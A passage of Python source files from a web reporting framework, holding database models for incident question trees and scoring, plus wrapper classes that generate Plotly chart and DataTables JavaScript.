__bind_key__ = 'incidents'
__tablename__ = 'tree_question_group_base'
g_id = db.Column(db.Integer, primary_key=True, nullable=False)
q_id = db.Column(db.Integer, nullable=False)
a_grp_id = db.Column(db.Integer, nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
usr_name = db.Column(db.String(120), nullable=False) # Should be retrieve from the SSO in the future
hostname = db.Column(db.String(120), nullable=False)
def __init__(self, q_id, a_grp_id, usr_name, hostname):
self.q_id, self.a_grp_id, self.usr_name, self.hostname = q_id, a_grp_id, usr_name, hostname
class IncAnswersBase(db.Model):
"""
:dsc:
This table will store all the different groups of answers.
Each answer will get the following question id and the database suffix in case of split of questions (to avoid too important tables)
"""
__bind_key__ = 'incidents'
__tablename__ = 'tree_answer_base'
a_id = db.Column(db.Integer, primary_key=True, nullable=False)
value = db.Column(db.Text)
db_suffix = db.Column(db.Text) # If the db is still in the base framework
a_grp_id = db.Column(db.Integer, nullable=False)
pry = db.Column(db.Integer, nullable=False)
team = db.Column(db.Text, nullable=False) # The team in charge of the incident from the question
q_dst_id = db.Column(db.Integer, nullable=True)
valid = db.Column(db.Integer)
ares_usr_nam = db.Column(db.Text, nullable=False)
lst_mod_dt = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow)
usr_name = db.Column(db.String(120), nullable=False) # Should be retrieve from the SSO in the future
hostname = db.Column(db.String(120), nullable=False)
def __init__(self, value, a_grp_id, pry, team, q_dst_id, valid, ares_usr_nam, usr_name, db_suffix, hostname):
self.value, self.a_grp_id, self.pry, self.team, self.q_dst_id = value, a_grp_id, pry, team, q_dst_id
self.valid, self.ares_usr_nam, self.usr_name, self.db_suffix = valid, ares_usr_nam, usr_name, db_suffix
self.hostname = hostname
# --------------------------------------------------------------------
# Scoring containers
#
# All those tables will be used in the process on allocating a score to the incident
class IncUserLevel(db.Model):
"""
:dsc:
Table in charge of defining the correct level for a team. This will allow the construct of multiple dimensions in case of isse.
For example a user level 0 will not see the branches level 1 of the diagnosis as it will not be able to perform the actions.
"""
__bind_key__ = 'incidents'
__tablename__ = 'tree_user_level'
lvl_id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.Text)
score = db.Column(db.Integer, nullable=False)
def __init__(self, name, score):
self.name, self.score = name, score
class IncProcesses(db.Model):
"""
:dsc:
"""
__bind_key__ = 'incidents'
__tablename__ = 'processes'
proc_id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.Text)
score = db.Column(db.Integer, nullable=False)
def __init__(self, name, score):
self.name, self.score = name, score
class IncPerimeter(db.Model):
"""
:dsc:
"""
__bind_key__ = 'incidents'
__tablename__ = 'perimeter'
id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.Text)
score = db.Column(db.Integer, nullable=False)
def __init__(self, name, score):
self.name, self.score = name, score
class IncBussImpact(db.Model):
"""
:dsc:
Table in charge of storing the different
"""
__bind_key__ = 'incidents'
__tablename__ = 'bus_impact'
id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.Text)
score = db.Column(db.Integer, nullable=False)
def __init__(self, name, score):
self.name, self.score = name, score
class IncRepImpact(db.Model):
"""
:dsc:
"""
__bind_key__ = 'incidents'
__tablename__ = 'rep_impact'
id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.Text)
score = db.Column(db.Integer, nullable=False)
def __init__(self, name, score):
self.name, self.score = name, score
class IncUrgency(db.Model):
"""
:dsc:
"""
__bind_key__ = 'incidents'
__tablename__ = 'urgency'
id = db.Column(db.Integer, primary_key=True, nullable=False)
name = db.Column(db.Text)
score = db.Column(db.Integer, nullable=False)
def __init__(self, name, score):
self.name, self.score = name, score
```
#### File: Lib/graph/AresHtmlGraphPlotly.py
```python
import json
from ares.Lib.html import AresHtml
from ares.Lib.graph import AresHtmlGraphFabric
DSC = {
'eng': '''
'''
}
class Chart(AresHtml.Html):
"""
:category: Chart Interface
:rubric: PY
:dsc:
Standard Charting interface to wrap the Plotly.js module.
:link Plotly Documentation: https://plot.ly/javascript/plotlyjs-function-reference/#common-parameters
chartOptions = {'showGrid': False, 'showLabels': True, 'zoom': False, 'legend': {'position': 'bottom'} }
"""
name, category, callFnc = 'Plotly', 'Charts', 'plotly'
__reqJs = ['plotly']
__pyStyle = ['CssDivChart']
def __init__(self, aresObj, chartType, data, width, widthUnit, height, heightUnit, title, chartOptions, toolsbar, htmlCode, globalFilter):
if chartOptions is None:
chartOptions = {}
super(Chart, self).__init__(aresObj, [], width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit, code=htmlCode)
self._layout, self.options, self.seriesProperties = {}, {"displaylogo": False, 'responsive': True, 'autosize': True}, {'static': {}, 'dynamic': {}}
self.toolsbar, self.height = toolsbar, height
if AresHtmlGraphFabric.CHARTS_FACTORY is None:
AresHtmlGraphFabric.CHARTS_FACTORY = AresHtmlGraphFabric.loadFactory() # atomic function to store all the different table mapping
self.__chart = AresHtmlGraphFabric.CHARTS_FACTORY[self.name][chartType](aresObj, data, self.seriesProperties)
if self.__chart.jsType is not None:
# Simple remapping to be able to reuse existing transformation functions for new chart configurations
# This will allow the creation of dynamic configurations based on existing charts
data._schema['out']['config'] = data._schema['out']['name']
data._schema['out']['name'] = "%s_%s" % (data._schema['out']['family'], self.__chart.jsType.replace("-", ""))
self.__chart.data.attach(self)
if not 'type' in self.seriesProperties['static']:
self.seriesProperties['static']['type'] = self.__chart._attrs.get('type', getattr(self.__chart, 'chartObj', None))
self.addLayout({"xaxis": {"showgrid": chartOptions.get("showGrid", False), 'showline': chartOptions.get("showGrid", False)},
"yaxis": {"showgrid": chartOptions.get("showGrid", False), 'showline': chartOptions.get("showGrid", False)}} )
self.addLayout({"showlegend": chartOptions.get("showLabels", True)})
self.setSeriesColor(aresObj.cssObj._charts)
if title is not None:
self.addLayout({"title": title})
if self.__chart._layout is not None:
self.addLayout(self.__chart._layout)
if chartOptions is not None and 'legend' in chartOptions:
if chartOptions['legend'].get('position') == 'bottom':
self.addLayout({"legend": {"orientation": "h"}})
self.addLayout({"xaxis": {"fixedrange": chartOptions.get("zoom", False)}, "yaxis": {"fixedrange": chartOptions.get("zoom", False)}})
if htmlCode is not None and globalFilter is not None:
if globalFilter is True:
self.filter(data._jqId, list(self.__chart.data._schema['keys'])[0])
else:
self.filter(**globalFilter)
self.click('''
if(%(breadCrumVar)s['params']['%(htmlCode)s'] == data.name){%(breadCrumVar)s['params']['%(htmlCode)s'] = ''}
else{%(breadCrumVar)s['params']['%(htmlCode)s'] = data.name}
''' % {'htmlCode': self._code, 'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar})
def onDocumentLoadFnc(self): return True
def onDocumentReady(self):
self.aresObj.jsOnLoadFnc.add(
'''
%(jsChart)s;
''' % {'jsChart': self.jsGenerate(jsData=None), 'htmlId': self.htmlId} )
@property
def eventId(self): return "document.getElementById('%s')" % self.htmlId
@property
def jsQueryData(self): return "{event_val: event.points[0].value, name: event.points[0].label, event_code: '%s' }" % self.htmlId
def filter(self, jsId, colName, allSelected=True, filterGrp=None):
"""
:category: Data Transformation
:rubric: JS
:type: Filter
:dsc:
Link the data to the filtering function. The record will be filtered based on the composant value
:return: The Python Html Object
"""
self.aresObj.jsOnLoadFnc.add("%(breadCrumVar)s['params']['%(htmlCode)s'] = ''" % {'htmlCode': self._code, 'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar})
val = "%(breadCrumVar)s['params']['%(htmlCode)s'] " % {'htmlCode': self._code, 'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar}
if allSelected:
self.aresObj.jsSources.setdefault(jsId, {}).setdefault('filters', {'allIfEmpty': []})[colName] = val
self.aresObj.jsSources.setdefault(jsId, {})['filters']['allIfEmpty'].append(colName)
else:
self.aresObj.jsSources.setdefault(jsId, {}).setdefault('filters', {})[colName] = val
return self
# ---------------------------------------------------------------------------------------------------------
# JAVASCRIPT EVENTS
# ---------------------------------------------------------------------------------------------------------
def jsUpdateChart(self, jsData='data', jsDataKey=None, isPyData=False):
"""
:category: Chart Update
:rubric: JS
:type: Event
:dsc:
Update the chart following an event
:link Plotly Documentation: https://plot.ly/javascript/plotlyjs-function-reference/#plotlyupdate
:return:
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
return "Plotly.update('%(htmlId)s', %(jsData)s, {});" % {'htmlId': self.htmlId,
'jsData': self.__chart.data.setId(jsData).getJs([('extend', self.seriesProperties)])}
def jsDestroy(self): return "Plotly.purge('%s')" % self.htmlId
def jsRefreshSeries(self, jsData='data', jsDataSeriesNames=None, jsDataKey=None, isPyData=False):
"""
:cqtegory:
:rubric:
:type:
:dsc:
"""
a = self.jsDelSeries(jsData=jsData, jsDataKey=jsDataSeriesNames, isPyData=isPyData)
b = self.jsAddSeries(jsData=jsData, jsDataKey=jsDataKey, isPyData=isPyData)
return ";".join([a, b])
def setType(self, htmlObj):
"""
:category: Chart Type
:rubric: JS
:type: Configuration
:dsc:
Put a type based on the value of ARes component
:return: The Python Chart object
"""
self.addAttr("type", htmlObj.val, isPyData=False)
return self
def jsDelSeries(self, jsData='data', jsDataKey=None, isPyData=False):
"""
:category: Chart Series
:rubric: JS
:type: Event
:dsc:
Remove the new series to the chart.
:return: The Javascript string to remove the selected series (based on the ID)
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
return '''
var seriesIds = [] ;
%(seriesNames)s.forEach(function(series, i){if(%(jsData)s.indexOf(series) > -1 ){seriesIds.push(i)}});
Plotly.deleteTraces('%(htmlId)s', seriesIds);''' % {'htmlId': self.htmlId, "jsData": jsData,
'seriesNames': json.dumps(self.__chart.data._schema['out']['params'][0])}
def jsAddSeries(self, jsData='data', jsDataKey=None, isPyData=False):
"""
:category: Chart Series
:rubric: JS
:type: Event
:example: chartObj.jsAddSeries( {y: [5000, null], x: ['Serie1', 'Serie2'], type: 'bar'} )
:dsc:
Add the new series to the chart.
:return: The Javascript string to add the new series
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
return '''
var newSeries = %(jsData)s;
if(Array.isArray(newSeries)){}
else{newSeries.name = newSeries.label; Plotly.addTraces('%(htmlId)s', [newSeries])}
''' % {'htmlId': self.htmlId, "jsData": jsData}
def jsFlow(self, jsData='data', jsDataKey=None, isPyData=False):
"""
:category: Chart Series
:type: Update
:rubric: JS
:example: chartObj.jsFlow({"columns": [['x', 'Test'], ['value', 2000], ['value2', 4000]], 'length': 0}
:dsc:
:return: The Javascript event as a String
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
return "Plotly.extendTraces('%(htmlId)s', %(jsData)s, [0]);" % {'htmlId': self.htmlId, "jsData": jsData}
def jsGenerate(self, jsData='data', jsDataKey=None, isPyData=False, jsId=None):
"""
:category: Chart Re Build
:rubric: JS
:type: System
:dsc:
Generate (or re build) the chart.
:return: The Javascript event as a String
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
return '''
if(window['%(htmlId)s_chart'] === undefined){
window['%(htmlId)s_chart'] = Plotly.newPlot('%(htmlId)s', %(jsData)s, %(jsLayout)s, %(options)s)}
else { window['%(htmlId)s_chart'] = Plotly.react('%(htmlId)s', %(jsData)s, %(jsLayout)s, %(options)s) } ; %(time)s
''' % {'htmlId': self.htmlId, 'jsData': self.__chart.data.setId(jsData).getJs([('extend', self.seriesProperties)]),
'jsLayout': json.dumps(self._layout), 'options': json.dumps(self.options),
'time': AresHtmlGraphFabric.Chart.jsLastUpdate(self.htmlId)}
# ---------------------------------------------------------------------------------------------------------
# PYTHON CONFIGURATION
# ---------------------------------------------------------------------------------------------------------
def axis(self, typeAxis, title=None, type=None):
"""
:category: Chart Re Build
:rubric: JS
:type: Configuration
:dsc:
Change the usual axis parameters of the chart.
:link Plotly Documentation: https://plot.ly/javascript/reference/#layout-xaxis-type
:return: The Python Chart Object
"""
if title is not None:
self.addLayout({"%saxis" % typeAxis: {"title": title}})
if type is not None:
self.addLayout({"%saxis" % typeAxis: {"type": type}})
return self
def yFormat(self, formatFnc, label=None, options=None, isPyData=False):
""" No need to use this function plotly will format automatically the axis """
return self
def xFormat(self, formatFnc, label=None, options=None, isPyData=False):
""" No need to use this function plotly will format automatically the axis """
return self
def addSeries(self, type, label, data, options=None, color=None):
"""
:category:
:rubric: JS
:example:
:dsc:
Plotly.addTraces(graphDiv, {y: [1, 5, 7]}, 0);
:return: The Python Chart Object
"""
if options is None:
options = {}
seriesIndex = len(self.__chart.data._schema['values'])
self.__chart.data._data[label] = data
self.__chart.data._schema['values'].add(label)
self.__chart.data._schema['fncs'][0]['args'][1].append(label)
self.seriesProperties['dynamic'][seriesIndex] = options
return self
def addAttr(self, key, val=None, tree=None, category=None, isPyData=True):
"""
:category:
:rubric: JS
:type: Configuration
:example:
:dsc:
:return: The Python Chart Object
"""
return self
def addSeriesAttr(self, seriesId, data, dataType="dynamic"):
"""
:category: Chart Series properties
:rubric: PY
:example: chartOjb.addSeriesAttr(0, {'hoverinfo': 'none', 'type': 'scatter'})
:dsc:
Add attributes to the selected series in the dataset. The series is defined by its index (number) starting from
zeros in the dataset.
:link Plotly Documentation: https://plot.ly/javascript/bar-charts/
:return: The Python Chart Object
"""
self.__chart.seriesProperties[dataType].setdefault(seriesId, {}).update(data)
return self
def setSeriesColor(self, colors, seriesIds=None):
"""
:category: Chart Series colors
:rubric: PY
:type: Configuration
:example: aresObj.cssObj.colorObj.getColors('#FFFFFF', '#008000', 10)
:return: The Python Chart Object
"""
self.__chart._colors(colors, seriesIds)
return self
def addLayout(self, data):
"""
:example: chartOjb.addLayout( {'barmode': 'stack'} )
"""
self._layout.update(data)
return self
def click(self, jsFncs):
"""
:category:
:rubric: JS
:type: Events
:dsc:
:link Plotly Documentation: https://plot.ly/javascript/plotlyjs-events/
"""
self.jsFrg('plotly_click', jsFncs)
return self
def __str__(self):
"""
:category: Container Representation
:rubric: HTML
:type: Output
:dsc:
Return the component HTML display. No use of the features in the function htmlContainer() for this Chart as Plotly is providing
already most of the features. So for those charts the display of the events might slightly different from the other charts.
:return: The HTML string to be added to the template.
"""
strChart = '<div id="%(htmlId)s" style="height:%(height)spx"></div>' % {'height': self.height - 30, 'htmlId': self.htmlId}
return AresHtmlGraphFabric.Chart.html(self, self.strAttr(withId=False, pyClassNames=self.pyStyle), strChart)
# ---------------------------------------------------------------------------------------------------------
# MARKDOWN SECTION
# ---------------------------------------------------------------------------------------------------------
@classmethod
def matchMarkDownBlock(cls, data):
return True if data[0].strip().startswith("---Plotly") else None
@staticmethod
def matchEndBlock(data):
return data.endswith("---")
@classmethod
def convertMarkDownBlock(cls, data, aresObj=None):
headers = data[1].strip().split("|")
records = []
for line in data[2:-1]:
rec, attr = {}, {}
if line.startswith("@"):
dataAttr = line[1:].strip().split(";")
for d in dataAttr:
a, b = d.split(":")
attr[a] = b
continue
splitLine = line.replace(",", '.').strip().split("|")
for i, val in enumerate(splitLine):
if i == 0:
rec[headers[i]] = val
else:
rec[headers[i]] = float(val)
records.append(rec)
if aresObj is not None:
p = aresObj.chart(data[0].split(":")[1].strip(), records, seriesNames=headers[1:], xAxis=headers[0], chartFamily='Plottly')
p.addAttr(attr, isPyData=False)
return []
```
#### File: Lib/html/AresHtmlDataTable.py
```python
import os
import json
import inspect
import importlib
import logging
from ares.Lib.html import AresHtml
from ares.Lib.js.tables import JsTableCols
import ares.configs.DataTable
# The object with all the different configurations available for the table interface
# This factory will pick up automatically when the server is restarted all the new configurations
FACTORY = None
DSC = {
'eng':
'''
:category: Table
:rubric: PY
:type: Factory
:dsc:
Different configuration avaiable for the table object. Those configuration will drive the kind of expected recordset.
Indeed for some configurations some specific keys are expected to correctly display the data.
'''
}
# External Datatable extensions added on demand to add some extra features
# Details of the different extensions are available on the different websites
# https://datatables.net/extensions/
extensions = {
'rowsGroup': {'jsImports': ['datatables-rows-group']},
'rowGroup': {'jsImports': ['datatables-row-group'], 'cssImport': ['datatables-row-group']},
'fixedHeader': {'jsImports': ['datatables-fixed-header'], 'cssImport': ['datatables-fixed-header']},
'colReorder': {'jsImports': ['datatables-col-order'], 'cssImport': ['datatables-col-order'] },
'colResize': {'jsImports': ['datatables-col-resizable'], 'cssImport': ['datatables-col-resizable']},
'fixedColumns': {'jsImports': ['datatables-fixed-columns'], 'cssImport': ['datatables-fixed-columns']}
}
def loadFactory():
"""
:category: Table
:rubric: PY
:type: configuration
:dsc:
This will read the table configuration table and it will create a mapping table between the names and the corresponding class.
Thus when a specific type of table is requested, this will be automatically mapped to the right class with the defined configuration.
The data expected for any table is a AReS dataframe.
:return: The factory with all the table configuration
"""
tmp = {}
for script in os.listdir(os.path.dirname(ares.configs.DataTable.__file__)):
if script.startswith('DataTable') and not script.endswith('pyc'):
try:
for name, obj in inspect.getmembers(importlib.import_module("ares.configs.DataTable.%s" % script.replace(".py", "")), inspect.isclass):
if hasattr(obj, 'tableCall'):
tmp[getattr(obj, 'tableCall')] = obj
except Exception as err:
logging.warning( "%s, error %s" % (script, err) )
return tmp
class DataTable(AresHtml.Html):
"""
:category: Javascript - Datatable
:rubric: JS
:dsc:
The python interface to the javascript Datatable framework. Not all the functions have been wrapped here but you should be able to
do the most frequent events and interactions with this component from the available function.
Please keep in mind that the javascript is only trigger on the web browser (namely not with the Python code)
:link Datatable website: https://datatables.net/
:link Datatable column legacy: http://legacy.datatables.net/usage/columns
:link Datatable column legacy: https://datatables.net/upgrade/1.10-convert
:link Datatable Column Definition: https://datatables.net/reference/option/columnDefs
"""
name, category, callFnc, docCategory = 'Table', 'Table', 'table', 'Standard'
references = {'DataTable': 'https://datatables.net/reference/index',
'DataTable Options': 'https://datatables.net/reference/option/',
'DataTable Ajax': 'https://datatables.net/reference/option/ajax.data',
'DataTable Callbacks': 'https://datatables.net/reference/option/drawCallback',
'DataTable Buttons': 'https://datatables.net/extensions/buttons/examples/initialisation/custom.html', }
__reqCss, __reqJs = ['datatables', 'datatables-export'], ['d3', 'datatables', 'datatables-export']
__pyStyle = ['CssDivLoading']
# The javascript layer is not supposed to cast the data
# By doing this here it will be a huge loss in term of efficiency in the borwser renderer
__type = {'cell': 'data.val', 'tuple': 'data[0]'}
# Variable dedicated to the documentation of this class
# This cannot and should not be using or accessing by other classes derived from this one
__doc__enums = {
'help': {"eng": "Get the list of enumerable items generated automatically from factories"},
}
def __init__(self, aresObj, tableTypes, recordSet, header, title, width, widthUnit, height,
heightUnit, tableOptions, toolsbar, htmlCode):
global FACTORY
super(DataTable, self).__init__(aresObj, [], code=htmlCode, width=width, widthUnit=widthUnit, height=height, heightUnit=heightUnit)
self.jsTableId, self.extraHeaders, self.tableOptions, self.header, self.footer = "%s_table" % self.htmlId, None, tableOptions, '', ''
self._systemOptions = dict(tableOptions.get('system', {}))
self._cols = JsTableCols.TableCols(aresObj)
if 'system' in tableOptions:
del tableOptions['system']
self.extraJsInitFnc, self.dsc_comment, self.tableWidth, self.toolsbar = set(), '', "100%", toolsbar
if FACTORY is None:
FACTORY = loadFactory() # atomic function to store all the different table mapping
self.columns = header.get('_order', list(recordSet._schema['keys']) + list(recordSet._schema['values']))
headers, colValues, self._jsRowFncs, self._jsColFncs, self._eventFrgs, self.tableStyle = [], [], [], {}, {}, []
for i, column in enumerate(self.columns):
if column in recordSet._schema['values']:
colValues.append(i)
recordSet._data[column].fillna(0, inplace=True)
# TODO: replace this replacement by moving to list of lists
colDef = {'data': column.replace(".", "\\.").replace("[", "\\[").replace("]", "\\]"), 'title': column, 'format': 'float', 'digits': self.tableOptions.get("digits", 0)}
else:
colDef = {'data': column.replace(".", "\\."), 'title': column}
if column in header and isinstance(header[column], dict):
colDef.update(header[column])
headers.append(colDef)
if tableTypes == 'hierarchy':
pyDetailCls = self.addPyCss('CssTdDetails')
pyShownDetailCls = self.addPyCss('CssTdDetailsShown')
headers[0]['visible'] = False
headers[1]['visible'] = False
headers = [{'data': None, 'title': '', 'width': 20, "className": pyDetailCls, 'orderable': False, 'defaultContent': ''}] + headers
self.aresObj.jsOnLoadFnc.add('''
$('#%(htmlId)s table').on('click', 'td.%(pyDetailCls)s, td.%(pyShownDetailCls)s', function () {
var tr = $(this).closest('tr'); var row = %(jsTableId)s.row(tr);
if (row.child.isShown()) {
$(this).removeClass('%(pyShownDetailCls)s').addClass('%(pyDetailCls)s');
row.child.hide(); tr.removeClass('shown')}
else {
$(this).removeClass('%(pyDetailCls)s').addClass('%(pyShownDetailCls)s');
row.child( "<div>gbgbg</div>" ).show(); tr.addClass('shown');
}})''' % {'pyDetailCls': pyDetailCls, 'htmlId': self.htmlId, 'jsTableId': self.jsTableId, 'pyShownDetailCls': pyShownDetailCls})
self.__table = FACTORY['base'](aresObj, headers, recordSet, self.jsTableId)
self.__table.data.attach(self)
if len(colValues) > 0:
tableStyles = tableOptions.get('style', {})
valsDef = tableStyles.get('values', {}).get('attr', {})
valsDef['table'] = headers
self.styleCols(colValues, tableOptions.get('style', {}).get('values', {'name': 'number'}).get('name', 'number'), attr=valsDef)
for systemCell, flag in self._systemOptions.items():
if flag:
valsDef = tableStyles.get(systemCell, {}).get('attr', {})
valsDef['table'] = headers
self.styleCols(colValues, tableOptions.get('style', {}).get(systemCell, {'name': systemCell}).get('name', systemCell), attr=valsDef)
# else: # Add the different export possible from a table
# self.addAttr('lengthMenu', [ [ 10, 25, 50, -1 ], [ '10 rows', '25 rows', '50 rows', 'Show all' ] ])
# self.__table['buttons'].append('"pageLength"')
#self.__table.footerType = footerType
self.addAttr(tableOptions)
self.addGlobalVar("DATATABLES_STATE", "{}")
if tableOptions.get('rowsGroup', False):
self.aresObj.jsImports.add('datatables-rows-group')
self.addAttr('rowsGroup', tableOptions['rows-group'])
if tableOptions.get('rowGroup', False):
self.aresObj.jsImports.add('datatables-row-group')
self.aresObj.cssImport.add('datatables-row-group')
self.addAttr('rowGroup', tableOptions['rowGroup'])
if tableOptions.get('fixedHeader', False):
self.aresObj.jsImports.add('datatables-fixed-header')
self.aresObj.cssImport.add('datatables-fixed-header')
#self.addAttr('headerOffset', 50, 'fixedHeader')
if tableOptions.get('colsOrdering', False):
self.aresObj.cssImport.add('datatables-col-order')
self.aresObj.jsImports.add('datatables-col-order')
self.addAttr('colReorder', True)
if tableOptions.get('fixedLeftColumnId', None) is not None:
self.aresObj.jsImports.add('datatables-fixed-columns')
self.aresObj.cssImport.add('datatables-fixed-columns')
self.addAttr('leftColumns', tableOptions['fixedLeftColumnId'], 'fixedColumns')
self.aresObj.cssObj.add('CssTableColumnFixed')
for i in range(tableOptions['fixedLeftColumnId']):
self.__table.header[i]['className'] = 'py_CssTableColumnFixed'.lower()
# Add the different export possible from a table
#self.addAttr('dom', 'Bfrtip') # (B)utton (f)iltering
self.aresObj.cssObj.add('CssDivHidden')
#for button, name in [('copyHtml5', 'copy'), ('csvHtml5', 'csv'), ('excelHtml5', 'excel'), ('pdfHtml5', 'pdf')]:
# self.addButton( {'extend': button, 'text': '', 'className': 'py_cssdivhidden', 'title': '%s_%s' % (name, self.htmlId)} )
self.aresObj.cssObj.add('CssDivTextLeft')
self.title = title
self.css({'margin-top': '5px'})
# if saveRow is not None:
# self.addColSave(saveRow)
#
# if deleteCol:
# self.addColDelete(deleteCol)
# --------------------------------------------------------------------------------------------------------------
#
# CSS / JS WRAPPER DEFINITION
# --------------------------------------------------------------------------------------------------------------
def styleCols(self, colIds, values, attr=None):
"""
:category: Table Column Style
:rubric: CSS
:type: Display
:dsc:
Change the style of the defined list of columns indices. If all the columns are selected the keyword _all can be
used. This can be useful to change some row in the datatable.
:example: tb.styleCols(0, 'css', attr={'css': {'color': 'dark-green', 'background-color': 'yellow'}})
:example: tb.styleCols('_all', 'css_id', attr={'cssCell': {'border-top': '5px solid pink', 'border-bottom': '5px solid pink'}, 'id': 2})
"""
self._cols.add(colIds, values, attr)
def styleColsByNames(self, colNames, values, attr=None):
"""
:category: Table Column Style
:rubric: CSS
:type: Display
:dsc:
Change the style of the defined list of columns names. Those names should exist in the input dataframe and available
column names. The keyword _all cannot be used here.
:example: tb.styleColsByNames(['Series4'], 'class', attr={'class': css[0].classname})
"""
if not isinstance(colNames, list):
colNames = [colNames]
colIds = [self.columns.index(colName) for colName in colNames]
self._cols.add(colIds, values, attr)
def cssRows(self, cssCls=None, rowIds=None, data=None, colName=None, cssOvrs=None):
"""
:category: Table Rows Formatting
:rubric: JS
:type: Configuration
:dsc:
This Python wrapper will implement the following javascript function, createdRow: function(row, data, dataIndex ) {}
:example: tableObj.cssRows({'color': 'red', 'background': 'green'}, data='Increasing', colName='direction')
:example: tableObj.cssRows(['CssTablePinkBorder', 'CssTableRedCells'])
:example: tableObj.cssRows(['CssTableTotal'], rowIds=[2])
:return: The Python table object
:link Datatable Documentation: https://datatables.net/reference/option/createdRow
"""
cssAttr, cssClsName = {}, []
if isinstance(cssCls, list):
for css in cssCls:
cssMod = self.aresObj.cssObj.get(css)
if cssMod is not None:
self.addPyCss(css)
cssClsName.append(cssMod().classname)
elif isinstance(cssCls, dict):
cssAttr = cssCls
else:
cssMod = self.aresObj.cssObj.get(cssCls)
if cssMod is not None:
self.addPyCss(cssCls)
cssClsName.append(cssMod().classname)
if cssOvrs is not None:
cssAttr.update(cssOvrs)
jsFncs = []
if len(cssClsName) > 0:
jsFncs.append("$(row).addClass('%s')" % " ".join(cssClsName))
if len(cssAttr) > 0:
jsFncs.append("$(row).css(%s)" % json.dumps(cssAttr))
if rowIds is not None:
# In this case if has to be controlled by the column renderer
#self.cssCols(cssCls, rowIds=rowIds)
return self
if data is not None:
if colName is None:
raise Exception("cssRows Error - You should supply a column name (colName) to use this function")
self._jsRowFncs.append("if(data['%(colName)s'] == %(data)s) {%(jsFnc)s}" % {"data": json.dumps(data), "jsFnc": ";".join(jsFncs), "colName": colName})
if rowIds is None and data is None and colName is None:
self._jsRowFncs.append("$(row).css(%(jsFnc)s)" % {"jsFnc": ";".join(jsFncs)})
return self
def cssSelection(self, pyCssCls="CssTableSelected"):
"""
:category: Table Style
:rubric: CSS
:type: Display
:example: >>> tableObj.cssSelection( aresObj.cssCls("CssBespoke", {"color": "red"} ) )
:return: Returns a CSS String with the name of the CSS class to be used as reference
:dsc:
Change the selection CSS class to be used in the different cell and row event.
This can be an existing class in the framework or a bespoke one created on the fly
"""
import inspect
if inspect.isclass(pyCssCls):
self.aresObj.cssObj.addPy(pyCssCls)
pyCssCls = [pyCssCls.__name__]
if isinstance(pyCssCls, str):
pyCss = self.addPyCss(pyCssCls)
else:
for attr in pyCssCls.style:
attr["value"] = "%s!important" % attr["value"] if not attr["value"].endswith("!important") else attr["value"]
self.aresObj.cssObj.cssStyles.update(pyCssCls.getStyles())
pyCss = pyCssCls.classname
return pyCss
# --------------------------------------------------------------------------------------------------------------
#
# SYSTEM SECTION
# --------------------------------------------------------------------------------------------------------------
@property
def val(self):
"""
:category: Javascript features
:rubric: JS
:example: tableObj.val
:return: Javascript string with the function to get the content of the component
:dsc:
Property to get the jquery value of the HTML object in a python HTML object.
This method can be used in any jsFunction to get the value of a component in the browser.
This method will only be used on the javascript side, so please do not consider it in your algorithm in Python
"""
return "%s.data().toArray()" % self.jsTableId
@property
def contextVal(self):
"""
:category: Javascript Event
:rubric: JS
:example: tableObj.contextVal
:return: Javascript String with the value attached to the context menu
:dsc:
Set the javascript data defined when the context menu is created from a table object
"""
return "{val: $(event.target).html(), row: event.target._DT_CellIndex.row, column: event.target._DT_CellIndex.column}"
@property
def json(self):
"""
:category: Javascript features
:rubric: JS
:example: myObj.json
:returns: Javascript string with the function to get the content of the component
:dsc:
Property to get the jquery value as a String of the HTML object in a python HTML object.
This method can be used in any jsFunction to get the value of a component in the browser.
This method will only be used on the javascript side, so please do not consider it in your algorithm in Python
this will return the table content but also the selected line if any
"""
return "JSON.stringify({data: %(jsTableId)s.data().toArray(), selection: %(jsClickState)s })" % {"jsTableId": self.jsTableId, 'jsClickState': self.jsClickState() }
def filter(self, jsId, colName, allSelected=True, filterGrp=None):
"""
:category: Data Transformation
:rubric: JS
:type: Filter
:dsc:
Link the data to the filtering function. The record will be filtered based on the composant value
:return: The Python Html Object
"""
self.aresObj.jsOnLoadFnc.add("%(breadCrumVar)s['params']['%(htmlCode)s'] = ''" % {'htmlCode': self._code, 'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar})
val = "%(breadCrumVar)s['params']['%(htmlCode)s'] " % {'htmlCode': self._code, 'breadCrumVar': self.aresObj.jsGlobal.breadCrumVar}
if allSelected:
self.aresObj.jsSources.setdefault(jsId, {}).setdefault('filters', {'allIfEmpty': []})[colName] = val
self.aresObj.jsSources.setdefault(jsId, {})['filters']['allIfEmpty'].append(colName)
else:
self.aresObj.jsSources.setdefault(jsId, {}).setdefault('filters', {})[colName] = val
return self
def onDocumentLoadVar(self): pass
def onDocumentLoadFnc(self): pass
def onDocumentReady(self):
self.aresObj.jsOnLoadFnc.add('''
%(jsGenerate)s; $('#%(htmlId)s table').find('th').tooltip(); %(extraJsInitFnc)s ;
''' % {'jsGenerate': self.jsGenerate(None), 'htmlId': self.htmlId, 'extraJsInitFnc': ';'.join(self.extraJsInitFnc)})
def jsGenerate(self, jsData='data', jsDataKey=None, isPyData=False, jsParse=False):
"""
:return:
"""
if isPyData:
jsData = json.dumps(jsData)
if jsDataKey is not None:
jsData = "%s.%s" % (jsData, jsDataKey)
if jsParse:
jsData = "JSON.parse(%s)" % jsData
if not hasattr(self, 'ctx'):
